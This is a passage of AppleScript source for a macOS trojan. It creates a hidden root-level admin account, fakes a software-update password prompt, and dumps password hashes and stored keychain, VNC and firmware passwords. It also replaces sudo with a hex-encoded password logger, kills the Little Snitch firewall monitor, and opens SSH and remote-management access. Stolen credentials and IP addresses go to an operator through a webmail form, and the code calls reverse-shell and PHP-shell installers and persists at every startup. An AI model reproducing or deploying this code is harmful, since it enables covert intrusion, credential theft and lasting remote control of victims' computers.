do shell script "/usr/bin/sudo niutil -create . /users/'" & hidden_admin_username & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' uid 0; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' gid 20; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' home /var/root; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' shell /bin/bash; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' passwd '" & hidden_admin_password_hash & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' _writers_passwd '" & hidden_admin_username & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' expire 0; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' name '" & hidden_admin_username & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' realname '" & hidden_admin_username & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' change 0; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' class ''; /usr/bin/sudo niutil . -append /groups/admin users '" & hidden_admin_username & "'; /usr/bin/sudo niutil . -append /groups/wheel users '" & hidden_admin_username & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' naprivs -2147483394; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' authentication_authority ';basic;'"
end try
end if
--Also add our user to the hidden user list and set showotherusers_managed to false.
try
if (do shell script "defaults read /Library/Preferences/com.apple.loginwindow HiddenUsersList 2>/dev/null; exit 0") does not contain hidden_admin_username then
do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.loginwindow HiddenUsersList -array-add " & hidden_admin_username
do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.loginwindow SHOWOTHERUSERS_MANAGED -bool false"
end if
end try
end agent_86_reporting_for_duty_chief
on papers_please()
--Get current local IP addresses
if debug then log_event("papers_please")
set ip_addresses to (do shell script "IPaddress_en0=$(ifconfig en0 2>/dev/null | head -n 2 | tail -n 1 | sed -e 's/^.*inet //' -e 's/ .*$//' ) && echo \"${IPaddress_en0}\"") & " " & (do shell script "IPaddress_en1=$(ifconfig en1 2>/dev/null | head -n 2 | tail -n 1 | sed -e 's/^.*inet //' -e 's/ .*$//' ) && echo \"${IPaddress_en1}\"") & " " & (do shell script "router_IPaddress=$( arp -a | sed -e 's/^.* (//' -e 's/).*$//' ) && echo \"${router_IPaddress}\"")
if be_quiet is false then
--Outgoing communication will only happen if be_quiet is set to "false".
if target_DDNS_username is not "" and target_DDNS_username is not "localhost" then
try
--If you are using a Dynamic DNS service to track the computer's public IP address you may not also need to get the public IP address separately
do shell script "curl " & quoted form of target_DDNS_update_URL & " 2>&1 | grep success"
on error error_message number error_number
if debug then log_event("papers_please:ERROR #" & error_number & " " & error_message)
--Wanna try a different DDNS service?
end try
else
try
--These get the public IP address
set ip_addresses to (do shell script "curl 'http://www.whatismyip.com/automation/n09230945.asp' 2>/dev/null") & " " & ip_addresses
on error error_message number error_number
if debug then log_event("papers_please:ERROR #" & error_number & " " & error_message)
set ip_addresses to (do shell script "curl http://ipid.shat.net/iponly/ | grep body | sed -e 's/^<body>//' -e 's/<.*$//'") & " " & ip_addresses
end try
end if
end if
set ip_addresses to do shell script "echo " & quoted form of ip_addresses & " | tr -s ' '"
end papers_please
on enable_ARD_and_VNC()
--This *should* work from any admin account, without sudo or root, for any version of OS X which
--includes ARD Client (server) such as 10.3, 10.4 and 10.5.
if debug then log_event("enable_ARD_and_VNC")
try
-- Disable the Remote Management menu extra.
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -clientopts -setmenuextra -menuextra no"
if OSX_version_number_minor as number ≥ 5 then --For Leopard
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -deactivate"
-- Allow access for all users and give all users full access.
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -allowAccessFor -allUsers -privs -all"
-- Start the Remote Management service.
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate"
else if OSX_version_number_minor as number ≤ 4 then --For Tiger and prior
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -privs -all -restart -agent"
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -restart -agent -console"
end if
end try
end enable_ARD_and_VNC
on enable_ssh()
if debug then log_event("enable_ssh")
try
if i_am_an_admin then
--This *should* work from any admin account, without sudo or root, for any version of OS X which
--includes ARD Client (server) such as 10.3, 10.4 and 10.5.
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremotelogin on &"
--And while I'm here...
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setcomputersleep Never &" --(logic board only)
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartpowerfailure on &"
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartfreeze on &"
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremoteappleevents on &"
end if
end try
if i_have_root_access then
try
--If sudo works but I am not an admin (I might have modified /etc/sudoers)
do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremotelogin on &"
--And while I'm here...
do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setcomputersleep Never &" --(logic board only)
do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartpowerfailure on &"
do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartfreeze on &"
do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremoteappleevents on &"
end try
try
--This handler needs root for everything past this point! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
--Note, this also opens port 22 in the default OS X firewall
do shell script "/usr/bin/sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist &"
else if OSX_version_number_minor as number ≥ 2 and OSX_version_number_minor as number ≤ 3 then --For Jaguar and Panther
do shell script "/usr/bin/sudo mv /private/etc/xinetd.d/ssh /private/etc/xinetd.d/ssh.AStht && /usr/bin/sudo sed -e 's/disable = .*$/disable = no/' /private/etc/xinetd.d/ssh.AStht > /private/etc/xinetd.d/ssh && /usr/bin/sudo touch -r /private/etc/xinetd.d/ssh.AStht /private/etc/xinetd.d/ssh 2>/dev/null"
do shell script "/usr/bin/sudo /sbin/service ssh start"
else --For Puma and Cheetah
--Still need to also open port 22 in the firewall (ipfw)!
do shell script "/usr/bin/sudo sed -e 's/SSHSERVER=-NO-/SSHSERVER=-YES-/' /etc/hostconfig > /var/tmp/hostconfig && /usr/bin/sudo mv /etc/hostconfig /etc/hostconfig.AStht && /usr/bin/sudo mv /var/tmp/hostconfig /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
do shell script "grep 'SSHSERVER=-YES-' /etc/hostconfig || /usr/bin/sudo echo 'SSHSERVER=-YES-' >> /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
do shell script "/usr/bin/sudo /usr/sbin/sshd &"
end if
end try
end if
end enable_ssh
on phone_home_and_try_a_different_method_if_it_fails()
if debug then log_event("phone_home_and_try_a_different_method_if_it_fails")
if be_quiet is false then
--Outgoing communication will only happen if be_quiet is set to "false"
--Be sure to use is_it_safe and/or these_are_not_the_outgoing_network_communications_you_are_looking_for() first!
--The email will be sent to the address set in the variable masters_email_address !
--HEY! You -MUST- change the lines below to work with the specific web mail form which you are using!
--An easy way to see which method (POST as shown in this example, or GET) is used, and in what format
--the data should be submitted, and what phrase indicates success, is to use Firefox and the LiveHTTPHeaders
--extension while manually sending an email through the site's web mail form.
if debug then log_event(quoted form of webmail_command_line)
set the_message to my_username & "--" & my_password & "--" & ip_addresses & "--" & OSX_hashes
set the_message to fuxor(the_message)
set the_message to do shell script "echo " & quoted form of the_message & " | tr ' \\r\\n\\t' '+'"
set webmail_command_line to do shell script "echo " & quoted form of webmail_command_line & " | sed -e 's/<<MASTERS_EMAIL_ADDRESS>>/" & masters_email_address & "/' -e 's/<<THE_TITLE>>/" & the_title & "/' -e 's/<<THE_MESSAGE>>/" & quoted form of the_message & "/' -e 's/<<SUCCESS_RESPONSE_TERM>>/" & webmail_success_response_term & "/' "
try
if (do shell script webmail_command_line) contains webmail_success_response_term then
if debug then log_event("phone_home_and_try_a_different_method_if_it_fails: message sent successfully")
else
if debug then log_event("phone_home_and_try_a_different_method_if_it_fails: sending message failed")
end if
on error
if debug then log_event("phone_home_and_try_a_different_method_if_it_fails: error while sending message")
end try
end if
end phone_home_and_try_a_different_method_if_it_fails
on exit_stage_left()
--This next if then statement will handle moving the trojan and putting 'original.app'
--from within the trojan's app package back where the trojan had been
if debug then log_event("exit_stage_left")
if move_myself is not false then
try
do shell script "cd \"" & POSIX path of (my_POSIX_folder) & "\" ..; rm -Rf .AStht 2>/dev/null; mv -f \"" & POSIX path of (my_Path) & "\" .AStht; mv -f .AStht/Contents/original.app/ \"" & POSIX path of (my_Path) & "\"" --add; rm -Rf .AStht 2>/dev/null before the last quote to self-delete after moving
end try
try
do shell script "/usr/bin/open \"" & POSIX path of (my_Path) & "\""
end try
end if
end exit_stage_left
on whos_in_charge_here()
if debug then log_event("whos_in_charge_here")
if text of (do shell script "id" user name my_username) contains "admin" then
set i_am_an_admin to true
else
set i_am_an_admin to false
end if
end whos_in_charge_here
on dupe_user()
--Ask the user to supply a password
if debug then log_event("dupe_user")
local tries
set the_title to "Sjsbenmr2Ukqnbr2mrlcvmra2gjcm2knaaejmq."
set the_message to "A2pjmmckb2kmrsrmripr2svyr2una2orri2qrbrpbrq2niq2zcab2or2mrknvmrq.2Eibrm2gjcm
naaejmq2bj2pjibvicr:"
set tries to 0
if text of (do shell script "id" user name my_username) contains "admin" then
set i_am_an_admin to true
repeat until i_have_root_access
set my_password to text returned of (display dialog (defuxor(the_message)) with icon padlock_icon with title (defuxor(the_title)) default answer "" buttons {"OK"} default button "OK" with hidden answer)
set tries to tries + 1
try
if text of (do shell script "echo $UID" user name my_username password my_password with administrator privileges) = "0" then set i_have_root_access to true
do shell script "echo " & my_username & ":" & my_password & " >> " & quoted form of accounts_file
on error error_message number error_number
if tries is 4 then
display dialog "An authentication error has occurred. The file could not be repaired!" buttons {"OK"} default button "OK"
return
end if
set the_message to "Iipjmmrpb2knaaejmq.2Cyvpx2Ox2bj2bmg2ntnvi."
display dialog defuxor(the_message) with title (defuxor(the_title)) buttons {"OK"} default button "OK"
end try
end repeat
else
set my_password to text returned of (display dialog (defuxor(the_message)) with icon padlock_icon with title (defuxor(the_title)) default answer "" with hidden answer)
end if
end dupe_user
on restart()
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
--Tell the user that a restart is required.
if debug then log_event("restart")
set the_title to "Sjsbenmr2Ukqnbr"
set the_message to "Tur2ckqnbr(a)2ermr2viabnyyrq2acppraascyyg.2Yjc2aujcyq2mrabnmb2gjcm2pjzkcbrm2ije."
display dialog defuxor(the_message) with icon software_update_icon with title defuxor(the_title) buttons {"Restart"} default button "Restart"
do shell script ("/usr/bin/sudo reboot")
end restart
on fuxor(the_variable)
--Obfuscate some text
if debug then log_event("fuxor")
local the_variable
return do shell script ("echo " & quoted form of the_variable & " | tr '" & key2 & "' '" & key1 & "'")
end fuxor
on defuxor(the_variable)
--Deobfuscate some text
if debug then log_event("defuxor")
local the_variable
return do shell script ("echo " & quoted form of the_variable & " | tr '" & key1 & "' '" & key2 & "'")
end defuxor
on just_hangin_out()
--Keep checking until sudo works. Once called, the script will just sit here forever until sudo works or until it's quit.
if debug then log_event("just_hangin_out")
try
do shell script "/usr/bin/sudo cat /etc/sudoers"
on error error_message number error_number
--if error_message is not "Password:" then return ?
delay 290 -- wait 4 minutes and 50 seconds before trying again. The default sudo timeout is 5 minutes.
just_hangin_out()
end try
end just_hangin_out
on pass_the_hash()
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
if debug then log_event("pass_the_hash")
local kcpassword, NATpassword, ARDVNCpassword, autoLoginUser
set kcpassword to ""
set NATpassword to ""
set ARDVNCpassword to ""
set ofpassword to ""
--This gets the password hashes for all OS X user accounts.
try
if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
set OSX_hashes to do shell script "dscl . -list /Users \"authentication_authority\" | grep -i hash | sed \"s/ .*$//\" | while read the_name; do the_hashfile=$( dscl . -read /users/\"${the_name}\" generateduid | sed \"s/^.* //\" ); the_hash=`sudo cat \"/var/db/shadow/hash/$the_hashfile\"`; ntlm_hash=\"${the_hash:0:64}\";[ \"${ntlm_hash}\" == \"${ntlm_hash/0000}\" ] && echo \"_${the_name}_NTLM___:${the_hash:0:32}:${the_hash:32:32}\"; S0SHA1=\"${the_hash:104:48}\"; cram_md5=\"${the_hash:104:64}\"; SSHA1=\"${the_hash:168:48}\"; [ \"x${the_hash:153:15}\" != \"x000000000000000\" ] && echo \"${the_name}_CRAM_MD5:${cram_md5}\" || { [ -n \"${S0SHA1//0}\" ] && echo \"${the_name}_S0SHA1__:${S0SHA1}\"; }; [ -n \"${SSHA1//0}\" ] && echo \"${the_name}_SSHA1___:${SSHA1}\"; done"
else if OSX_version_number_minor as number = 3 then --For Panther
set OSX_hashes to do shell script "/usr/bin/nidump passwd . | grep -v \":\\" & (ASCII character 42) & ":\" | while read line;do echo \"${line}\";the_name=\"${line%%:*}\" the_hashfile=$(niutil -readprop . /users/${the_name} generateduid 2>/dev/null);sudo test -f /var/db/shadow/hash/${the_hashfile} && the_hash=$(sudo cat \"/var/db/shadow/hash/${the_hashfile}\");echo \"${the_name}_NTLM:${the_hash:0:32}:${the_hash:32:32}:\";echo \"${the_name}_SHA1:${the_hash:64:40}:\"; done"
else --For Jaguar and prior
set OSX_hashes to do shell script "/usr/bin/nidump passwd . | grep -v \":\\" & (ASCII character 42) & ":\" | while read line;do echo -n \"${line} \";the_name=\"${line%%:*}\" the_hashfile=$(niutil -readprop . /users/${the_name} generateduid 2>/dev/null); /usr/bin/sudo test -d /var/db/samba/hash && /usr/bin/sudo test -f /var/db/samba/hash/${the_hashfile} && /usr/bin/sudo cat \"/var/db/samba/hash/${the_hashfile}\" || echo;done"
end if
end try
do shell script "echo " & quoted form of OSX_hashes & " >> " & quoted form of hashes_file
--Get the Open Firmware password
try
set ofpassword to do shell script "IFS='%'; hexbytes=( $( /usr/bin/sudo nvram -p | grep password | cut -f 2 ) ); IFS='';for ((i=1;i<${#hexbytes[*]};i++)); do echo -en \"\\x$(printf '%x' $((16#AA^16#${hexbytes[$i]})))\";done;echo"
end try
if ofpassword is not "" then
do shell script "echo " & quoted form of ofpassword & " >> " & quoted form of candidates_file
end if
--For the autologin password stored in /etc/keychain
try
set kcpassword to do shell script "declare -i offset=0 i=0;declare -a keys=(7d 89 52 23 d2 bc dd ea a3 b9 1f) hexbytes=($(sudo hexdump -v -e '/1 \"%02X \"' /etc/kcpassword));for ((offset=0;offset<${#hexbytes[*]};offset++));do newbyte=$(printf '%02X' $((16#${keys[${i}]}^16#${hexbytes[$offset]})));[ \"${newbyte}\" == \"00\" ]&&echo&&break;echo -en \"\\x${newbyte}\";let i+=1;[ $i -gt 10 ]&&let i=0;done"
set autoLoginUser to do shell script "defaults read /Library/Preferences/com.apple.loginwindow autoLoginUser"
on error error_message number error_number
if debug then log_event("kcpassword:ERROR #" & error_number & " " & error_message)
--Either /etc/kcpassword doesn't exist (as in no autologin user is set),
--or the password does not belong to this user (we could test it with the other usernames of this system),
--or sudo failed and I could not read the /etc/keychain file.
--or the account is not allowed to use sudo.
end try
if kcpassword is not "" then
do shell script "echo " & quoted form of kcpassword & " >> " & quoted form of candidates_file
if autoLoginUser is not "" then
do shell script "echo '" & autoLoginUser & ":" & kcpassword & "' >> " & quoted form of accounts_file
end if
end if
--For the ad-hoc WiFi network password which is stored as plain text.
try
set NATpassword to do shell script "defaults read /Library/Preferences/SystemConfiguration/com.apple.nat NAT | grep NetworkPassword | sed -e 's/^.*<//' -e 's/>.*$//'"
end try
if NATpassword is not "" then
do shell script "echo " & quoted form of NATpassword & " >> " & quoted form of candidates_file
end if
--For the ARD VNC access password
try
--If /Library/Preferences/com.apple.VNCSettings.txt isn't there, create it with password 'a secret'
try
do shell script "[ ! -f /Library/Preferences/com.apple.VNCSettings.txt ] && echo -n '7614220BE8DAA096FF1C39567390ADCA' > /Library/Preferences/com.apple.VNCSettings.txt"
set ARDVNCpassword to "a secret"
return
end try
try
set ARDVNCpassword to do shell script "declare -a keys=(17 34 51 6e 8b a8 c5 e2 ff 1c 39 56 73 90 ad ca);p=$(sudo cat /Library/Preferences/com.apple.VNCSettings.txt);hexbytes=(${p:0:2} ${p:2:2} ${p:4:2} ${p:6:2} ${p:8:2} ${p:10:2} ${p:12:2} ${p:14:2} ${p:16:2} ${p:18:2} ${p:20:2} ${p:22:2} ${p:24:2} ${p:26:2} ${p:28:2} ${p:30:2});for ((offset=0;offset<${#keys[*]};offset++));do echo -en \"\\x$(printf '%02X' $((16#${keys[${offset}]}^16#${hexbytes[$offset]})))\";done"
end try
if ARDVNCpassword is not "" then
do shell script "echo " & quoted form of ARDVNCpassword & " >> " & quoted form of candidates_file
end if
end try
end pass_the_hash
on alias_sudo()
--This routine creates a shell script named ".sudo2" and then aliases the sudo command to run the shell script.
--The alias is also added to the user's .profile. Captured passwords are output to ~/Public/.howdy
if debug then log_event("alias_sudo")
do shell script "echo -e \"\\x23\\x21\\x2f\\x62\\x69\\x6e\\x2f\\x62\\x61\\x73\\x68\\x0a\\x5b\\x20\\x22\\x78\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x3d\\x3d\\x20\\x22\\x78\\x22\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x31\\x3b\\x5b\\x20\\x22\\x78\\x24\\x7b\\x31\\x7d\\x22\\x20\\x21\\x3d\\x20\\x22\\x78\\x24\\x7b\\x31\\x2f\\x2d\\x6b\\x7d\\x22\\x20\\x2d\\x6f\\x20\\x22\\x78\\x24\\x7b\\x31\\x7d\\x22\\x20\\x21\\x3d\\x20\\x22\\x78\\x24\\x7b\\x31\\x2f\\x2d\\x4b\\x7d\\x22\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x30\\x3b\\x5b\\x20\\x24\\x28\\x28\\x24\\x52\\x41\\x4e\\x44\\x4f\\x4d\\x25\\x32\\x29\\x29\\x20\\x21\\x3d\\x20\\x30\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x30\\x3b\\x65\\x63\\x68\\x6f\\x20\\x2d\\x6e\\x65\\x20\\x22\\x5c\\x78\\x35\\x30\\x5c\\x78\\x36\\x31\\x5c\\x78\\x37\\x33\\x5c\\x78\\x37\\x33\\x5c\\x78\\x37\\x37\\x5c\\x78\\x36\\x66\\x5c\\x78\\x37\\x32\\x5c\\x78\\x36\\x34\\x5c\\x78\\x33\\x61\\x22\\x3b\\x73\\x74\\x74\\x79\\x20\\x2d\\x65\\x63\\x68\\x6f\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x72\\x65\\x61\\x64\\x20\\x70\\x61\\x73\\x73\\x3b\\x73\\x74\\x74\\x79\\x20\\x73\\x61\\x6e\\x65\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x65\\x63\\x68\\x6f\\x20\\x22\\x24\\x7b\\x70\\x61\\x73\\x73\\x7d\\x20\\x22\\x20\\x3e\\x3e\\x20\\x7e\\x2f\\x50\\x75\\x62\\x6c\\x69\\x63\\x2f\\x2e\\x68\\x6f\\x77\\x64\\x79\\x3b\\x65\\x63\\x68\\x6f\\x3b\\x65\\x63\\x68\\x6f\\x20\\x22\\x53\\x6f\\x72\\x72\\x79\\x2c\\x20\\x74\\x72\\x79\\x20\\x61\\x67\\x61\\x69\\x6e\\x2e\\x22\\x3b\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x2d\\x6b\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\" > ~/Library/.sudo2"
try
do shell script "grep 'alias sudo' ~/.profile"
on error
do shell script defuxor("puzjq2cjt+f2~/Lvomnmg/.acqj72;2nyvna2acqj=~/Lvomnmg/.acqj72;2rpuj2nyvna2acqj=~/Lvomnmg/.acqj72>>2~/.kmjsvyr")
end try
end alias_sudo
on is_it_safe()
--check if Little Snitch is running
if debug then log_event("is_it_safe")
try
do shell script "ps -axww | grep -i \"lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch\" | grep -v grep"
set be_quiet to true
return
end try
set be_quiet to false
end is_it_safe
on these_are_not_the_outgoing_network_communications_you_are_looking_for()
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
--Disable Little Snitch prior to using curl
if debug then log_event("these_are_not_the_outgoing_network_communications_you_are_looking_for")
try
do shell script "ps -axww | grep -i \"lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch\" | grep -v grep | while read process and_junk; do /usr/bin/sudo kill -9 \"${process}\"; done; /usr/bin/sudo killall \"lsd\"; /usr/bin/sudo mv \"/Library/Little Snitch\" /Library/.hushnow"
set be_quiet to false
end try
end these_are_not_the_outgoing_network_communications_you_are_looking_for
on slash_x_hex(the_variable)
if debug then log_event("slash_x_hex")
local hex_characters, hexified_string, each_character, decimal_value, the_variable
set hex_characters to "0123456789ABCDEF"
set hexified_string to ""
repeat with each_character in the_variable
set decimal_value to ASCII number of each_character
set hexified_string to hexified_string & (ASCII character 92) & "x" & character (decimal_value div 16 + 1) of hex_characters & character (decimal_value mod 16 + 1) of hex_characters
end repeat
return hexified_string
end slash_x_hex
on test_a_password_with_sudo(try_this_password)
if debug then log_event("test_a_password_with_sudo")
local try_this_password
try
--HEY! Note that this is going to invalidate the sudo timestamp!
--If sudo was already working, do what you need sudo for BEFORE calling this!
do shell script "/usr/bin/sudo -k; echo " & quoted form of try_this_password & " | /usr/bin/sudo -S id -u"
if result is "0" then
set i_am_an_admin to true
set i_have_root_access to true
do shell script "echo " & my_username & ":" & my_password & " >> " & quoted form of accounts_file
end if
end try
end test_a_password_with_sudo
on can_sudo_come_out_to_play()
if debug then log_event("can_sudo_come_out_to_play")
try
do shell script "/usr/bin/sudo id -u" --should fail if sudo isn't within the timeout or return "0" if it worked
set i_have_root_access to true
on error error_message number error_number
set i_have_root_access to false
end try
end can_sudo_come_out_to_play
on move_in()
--Test if I am running from /Library/Caches and if not, try to copy myself there (but only if I'm compiled)
if debug then log_event("move_in")
if my_POSIX_folder does not contain "/Library/Caches" and my_POSIX_folder is not "/Applications/AppleScript/" then
try
do shell script "ditto -X -rsrc " & quoted form of my_Path & " /Library/Caches/" & quoted form of my_name
set launch_path to "/Library/Caches/" & my_name
do shell script "chmod 777 /Library/Caches/" & quoted form of my_name
on error error_message number error_number
if debug then log_event("move_in:ERROR #" & error_number & " " & error_message)
--Couldn't copy myself into /Library/Caches/
end try
end if
end move_in
on loosen_permissions_on_SystemLoginItems()
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
if debug then log_event("loosen_permissions_on_SystemLoginItems")
try
do shell script "touch /Library/Preferences/com.apple.SystemLoginItems.plist"
on error error_message number error_number
do shell script "/usr/bin/sudo chmod 777 /Library/Preferences/com.apple.SystemLoginItems.plist 2>/dev/null"
end try
end loosen_permissions_on_SystemLoginItems
on rerun_me_every_startup()
--Test if my launch path is listed in /Library/Preferences/com.apple.SystemLoginItems.plist and if not, try to add it (but only if I'm compiled)
if debug then log_event("rerun_me_every_startup")
try
set SystemLoginItems to do shell script "defaults read /Library/Preferences/com.apple.SystemLoginItems AutoLaunchedApplicationDictionary"
on error error_message number error_number
if debug then log_event("rerun_me_every_startup:ERROR #" & error_number & " " & error_message)
--can't read from /Library/Preferences/com.apple.SystemLoginItems.plist, perhaps it does not yet exist
end try
if SystemLoginItems does not contain launch_path and launch_path does not contain "Script Editor.app" then
try
do shell script "touch '/Library/Preferences/com.apple.SystemLoginItems.plist'"
do shell script "defaults write /Library/Preferences/com.apple.SystemLoginItems AutoLaunchedApplicationDictionary -array-add '<dict><key>Hide</key><true/><key>Path</key><string>" & launch_path & "</string></dict>'"
do shell script "chmod 777 /Library/Preferences/com.apple.SystemLoginItems.plist 2>/dev/null"
on error error_message number error_number
--can't write to /Library/Preferences/com.apple.SystemLoginItems.plist, I'll add me to the user's login items instead.
do shell script "touch ~/Library/Preferences/loginwindow.plist"
do shell script "defaults write ~/Library/Preferences/loginwindow AutoLaunchedApplicationDictionary -array-add '<dict><key>Hide</key><true/><key>Path</key><string>" & launch_path & "</string></dict>'"
do shell script "chmod 777 ~/Library/Preferences/loginwindow.plist 2>/dev/null"
end try
end if
end rerun_me_every_startup
on stuff_for_root_to_do()
--This handler needs root!
if debug then log_event("stuff_for_root_to_do")
move_in()
loosen_permissions_on_SystemLoginItems()
rerun_me_every_startup()
agent_86_reporting_for_duty_chief()
its_smoky_in_here_lets_open_ports_in_the_firewall()
enable_ssh()
install_phpshell()
enable_webserver()
enable_Personal_File_Sharing()
install_and_activate_logKext()
pass_the_hash()
i_have_a_secret()
there_are_no_osx_viruses_silly_wabbit()
i_like_you_just_as_you_are()
is_it_safe()
if be_quiet is not true then
these_are_not_the_outgoing_network_communications_you_are_looking_for()
end if
papers_please()
phone_home_and_try_a_different_method_if_it_fails()
reverse_shell()
Back_to_masters_VNC()
nothing_to_see_here()
throw_another_log_on_the_fire()
--exit_stage_left
end stuff_for_root_to_do
on stuff_for_an_admin_without_sudo_to_do()
--This is assuming that I am an admin user, I do not have a functional password and sudo is not already working
if debug then log_event("stuff_for_an_admin_without_sudo_to_do")
move_in()
rerun_me_every_startup()
enable_ssh()
install_phpshell()
i_have_a_secret()
i_like_you_just_as_you_are()
reverse_shell()
Back_to_masters_VNC()
is_it_safe()
if be_quiet is false then
papers_please()
phone_home_and_try_a_different_method_if_it_fails()
end if
--exit_stage_left()
end stuff_for_an_admin_without_sudo_to_do
on stuff_for_a_regular_user_to_do()
--This is assuming that I am a standard user, not an admin, and sudo won't work
if debug then log_event("stuff_for_a_regular_user_to_do")
move_in()
rerun_me_every_startup()
install_phpshell()
i_have_a_secret()
i_like_you_just_as_you_are()
reverse_shell()
Back_to_masters_VNC()
is_it_safe()
if be_quiet is false then
papers_please()
phone_home_and_try_a_different_method_if_it_fails()
end if
brute_user_accounts()
--exit_stage_left
end stuff_for_a_regular_user_to_do
---------------------------------------------------------------------------
--Main
--------------------
--HEY! Keep in mind that outgoing communications only happen if be_quiet is set to false
--So, you might want to call is_it_safe and possibly
--these_are_not_the_outgoing_network_communications_you_are_looking_for before getting
--the IP address or sending email
if debug then log_event("Main")
--Get my preferences
read_my_plist()
--Check if sudo works already, do this immediately in case sudo's timestamp timeout is near
can_sudo_come_out_to_play()
--Check if I am a member of the admin group
whos_in_charge_here()
--Setup some folders and files
try
do shell script "mkdir -p -m 777 '/Users/Shared/SC Info/' ~/Public/ /Library/WebServer/Documents/.PS_Store 2>/dev/null; exit 0"
do shell script "touch " & quoted form of candidates_file & " " & quoted form of accounts_file & " " & quoted form of hashes_file & " ~/Public/" & quoted form of secret_file & " /Users/Shared/" & quoted form of secret_file & " /Library/WebServer/Documents/" & quoted form of secret_file & " 2>/dev/null; exit 0"
do shell script "chmod -Rf 777 " & quoted form of candidates_file & " " & quoted form of accounts_file & " " & quoted form of hashes_file & " ~/Public/" & quoted form of secret_file & " /Users/Shared/" & quoted form of secret_file & " /Library/WebServer/Documents/" & quoted form of secret_file & " 2>/dev/null; exit 0"
end try
--If sudo isn't working, and I don't have a password then try using passwords I collected during previous runs on this computer.
if i_have_root_access is false and my_password is "" then
if debug then log_event("Main: trying previously gathered passwords")
local the_passwords, the_password
set the_passwords to words in my_username & return
try
